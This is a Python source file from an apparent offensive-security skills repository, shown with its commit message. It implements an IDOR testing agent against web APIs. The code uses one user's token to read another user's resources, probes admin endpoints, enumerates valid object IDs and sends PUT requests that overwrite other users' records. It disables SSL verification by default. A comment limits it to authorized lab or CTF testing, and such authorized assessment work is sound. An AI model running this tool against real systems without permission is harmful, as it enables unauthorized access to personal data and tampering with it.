Files
Anthropic-Cybersecurity-Skills/skills/exploiting-idor-vulnerabilities/scripts/agent.py
T
mukul975 c47eed6a64 Production hardening: security fixes, code quality, 724 skills complete
- Fix 25 shell=True subprocess calls with list-based commands
- Fix 49 verify=False in defensive skills (env-var override)
- Add timeout to 231 HTTP/subprocess/socket calls
- Fix 6 SQL injection patterns with whitelist validation
- Replace 8 __import__() with standard imports
- Remove 701 unused imports across 442 files
- Add authorized-testing disclaimers to all offensive skills
- Complete 11 incomplete skill directories
- Expand 10 stub SKILL.md files with full content
- Fix 2 YAML parse errors in frontmatter
- Fix 5 pre-existing syntax errors
- Convert 22 hardcoded paths/ports to environment variables
- Back up 21 redundant skill pairs to .bak
- Fix 2 global declaration errors
- 724/724 skills with full folder anatomy (SKILL.md + agent.py + api-reference.md + LICENSE)
- 0 compile errors across all 724 agent.py files
2026-03-19 13:26:49 +01:00

178 lines
7.2 KiB
Python

#!/usr/bin/env python3
# For authorized testing in lab/CTF environments only
"""IDOR vulnerability detection agent using requests with multi-session comparison."""
import argparse
import json
import logging
import sys
import hashlib
try:
import requests
except ImportError:
sys.exit("requests is required: pip install requests")
logging.basicConfig(level=logging.INFO, format="%(asctime)s [%(levelname)s] %(message)s")
logger = logging.getLogger(__name__)
class IDORTester:
"""Tests for Insecure Direct Object Reference vulnerabilities."""
def __init__(self, base_url: str, user_a_token: str, user_b_token: str,
verify_ssl: bool = False):
self.base_url = base_url.rstrip("/")
self.verify = verify_ssl
self.session_a = requests.Session()
self.session_a.headers.update({"Authorization": f"Bearer {user_a_token}"})
self.session_a.verify = verify_ssl
self.session_b = requests.Session()
self.session_b.headers.update({"Authorization": f"Bearer {user_b_token}"})
self.session_b.verify = verify_ssl
self.findings = []
def _response_hash(self, resp: requests.Response) -> str:
return hashlib.md5(resp.content).hexdigest()
def test_horizontal_idor(self, endpoint_template: str, own_id: str,
other_id: str, method: str = "GET") -> dict:
"""Test horizontal IDOR by accessing another user's resource."""
own_url = f"{self.base_url}{endpoint_template.replace('{id}', own_id)}"
other_url = f"{self.base_url}{endpoint_template.replace('{id}', other_id)}"
own_resp = self.session_a.request(method, own_url, timeout=10)
other_resp = self.session_a.request(method, other_url, timeout=10)
vulnerable = (
other_resp.status_code == 200
and own_resp.status_code == 200
and self._response_hash(other_resp) != self._response_hash(own_resp)
)
result = {
"type": "horizontal",
"endpoint": endpoint_template,
"method": method,
"own_status": own_resp.status_code,
"other_status": other_resp.status_code,
"vulnerable": vulnerable,
"own_content_length": len(own_resp.content),
"other_content_length": len(other_resp.content),
}
if vulnerable:
self.findings.append(result)
logger.warning("IDOR FOUND: %s %s", method, endpoint_template)
return result
def test_vertical_idor(self, endpoint: str, method: str = "GET") -> dict:
"""Test vertical IDOR by accessing admin endpoints with regular user token."""
url = f"{self.base_url}{endpoint}"
resp = self.session_a.request(method, url, timeout=10)
vulnerable = resp.status_code == 200
result = {
"type": "vertical",
"endpoint": endpoint,
"method": method,
"status_code": resp.status_code,
"vulnerable": vulnerable,
"content_length": len(resp.content),
}
if vulnerable:
self.findings.append(result)
logger.warning("Vertical IDOR: %s %s (status=%d)", method, endpoint, resp.status_code)
return result
def test_id_enumeration(self, endpoint_template: str, id_range: range,
method: str = "GET") -> dict:
"""Enumerate valid object IDs via response code analysis."""
valid_ids = []
for obj_id in id_range:
url = f"{self.base_url}{endpoint_template.replace('{id}', str(obj_id))}"
try:
resp = self.session_a.request(method, url, timeout=5)
if resp.status_code == 200:
valid_ids.append(obj_id)
except requests.RequestException:
continue
logger.info("Enumerated %d valid IDs in range %d-%d", len(valid_ids),
id_range.start, id_range.stop)
return {
"endpoint": endpoint_template,
"range_tested": f"{id_range.start}-{id_range.stop}",
"valid_ids_found": len(valid_ids),
"sample_ids": valid_ids[:10],
}
def test_write_idor(self, endpoint_template: str, other_id: str,
payload: dict) -> dict:
"""Test write-based IDOR via PUT/PATCH with another user's ID."""
url = f"{self.base_url}{endpoint_template.replace('{id}', other_id)}"
resp = self.session_a.put(url, json=payload, timeout=10)
vulnerable = resp.status_code in (200, 201, 204)
result = {
"type": "write_idor",
"endpoint": endpoint_template,
"method": "PUT",
"target_id": other_id,
"status_code": resp.status_code,
"vulnerable": vulnerable,
}
if vulnerable:
self.findings.append(result)
logger.warning("Write IDOR: PUT %s (status=%d)", endpoint_template, resp.status_code)
return result
def test_cross_session(self, endpoint_template: str, resource_id: str) -> dict:
"""Compare responses between two authenticated sessions for the same resource."""
url = f"{self.base_url}{endpoint_template.replace('{id}', resource_id)}"
resp_a = self.session_a.get(url, timeout=10)
resp_b = self.session_b.get(url, timeout=10)
same_response = self._response_hash(resp_a) == self._response_hash(resp_b)
result = {
"endpoint": endpoint_template,
"resource_id": resource_id,
"user_a_status": resp_a.status_code,
"user_b_status": resp_b.status_code,
"same_response": same_response,
"missing_authz": resp_a.status_code == 200 and resp_b.status_code == 200 and same_response,
}
return result
def generate_report(self) -> dict:
"""Compile IDOR assessment results."""
return {
"target": self.base_url,
"total_findings": len(self.findings),
"findings": self.findings,
"severity": "High" if self.findings else "None",
}
def main():
parser = argparse.ArgumentParser(description="IDOR Vulnerability Testing Agent")
parser.add_argument("--url", required=True, help="Base URL of the target API")
parser.add_argument("--token-a", required=True, help="JWT token for User A")
parser.add_argument("--token-b", required=True, help="JWT token for User B")
parser.add_argument("--endpoints", nargs="+", default=["/api/v1/users/{id}/profile"])
parser.add_argument("--own-id", default="101", help="User A's resource ID")
parser.add_argument("--other-id", default="102", help="User B's resource ID")
parser.add_argument("--output", default="idor_report.json")
args = parser.parse_args()
tester = IDORTester(args.url, args.token_a, args.token_b)
all_results = []
for ep in args.endpoints:
result = tester.test_horizontal_idor(ep, args.own_id, args.other_id)
all_results.append(result)
report = tester.generate_report()
report["test_details"] = all_results
with open(args.output, "w") as f:
json.dump(report, f, indent=2)
logger.info("Report saved to %s", args.output)
print(json.dumps(report, indent=2))
if __name__ == "__main__":
main()